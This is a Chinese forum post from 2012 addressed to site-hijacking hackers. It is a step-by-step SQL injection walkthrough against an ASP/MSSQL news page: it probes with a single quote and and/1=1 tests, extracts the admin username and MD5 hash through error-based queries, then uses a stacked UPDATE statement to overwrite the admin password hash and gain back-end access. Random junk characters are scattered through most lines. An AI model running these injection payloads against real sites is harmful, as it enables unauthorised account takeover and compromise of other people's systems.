经常拿站的黑阔们一定经常碰到,某个网站有注入,管理员帐号和密码多暴出来了。
, B3 D( ]# x4 ^# G+ q( i+ ~可是密码是MD5加密的。而且在线的MD5解密不了。你说咋办?直接修改管理员密码的MD5值。然后进后台!(当然是有条件的。MSSQL)" I1 u% m& E& _/ A. _6 n
测试如下:
2 K. R8 Q6 _& ohttp://www.tmdsb.com/news.asp?id=121 `: Z# U4 m& h3 H% C% [* O# y4 s
在地址后输入单引号,显示
2 W% ^+ ]; h' y/ _5 @1 p- ~Microsoft OLE DB Provider for SQL Server 错误 ’80040e14’
4 X7 N' l- F; [" v( T/ a字符串 ’’’ 之前有未闭合的引号
4 y" I# N# ]5 M0 u5 G! o6 F/news/tmdws.asp,行63
f1 a% j* \& o) S: P5 v7 C说明没有过滤单引号且数据库是MSSQL.( m0 Z0 E# U' m' ]' f$ X) Z
and 1=1正常。and 1=2出错。肯定存在注入7 B5 w' p$ c% U; h T
接着输入. d/ [1 i5 [, e; d7 n
http://www.tmdsb.com/news.asp?id=1 or admin_user in (select id from admin)7 E/ i6 O; G" i% W
得到帐号为:admin& h" G$ i+ M5 l) T1 P$ H' b8 a
http://www.tmdsb.com/news.asp?id=121 or admin_password in (select id from admin)& I ~2 W/ P; G' y
得到密码为:a4716077c2ba075c9 a5 S( B2 Z; X( C
接下来我们就可以改密码了。但我们先前要知道我们加密的字符:e8dc763194f29433. f! q0 W4 m; B) y. M
命令如下 :
2 r9 J! [" c3 k6 X* E2 u;update shop_admin set password=’e8dc763194f29433’ where password=’a4716077c2ba075c’–
& h7 U2 p- _; ]) q! T( J这句的意思就是用e8dc763194f29433替换a4716077c2ba075c,以达到修改密码的目的 |
发表于 2012-9-13 17:55:24
收藏
支持
反对
发表于 2012-9-14 16:22:41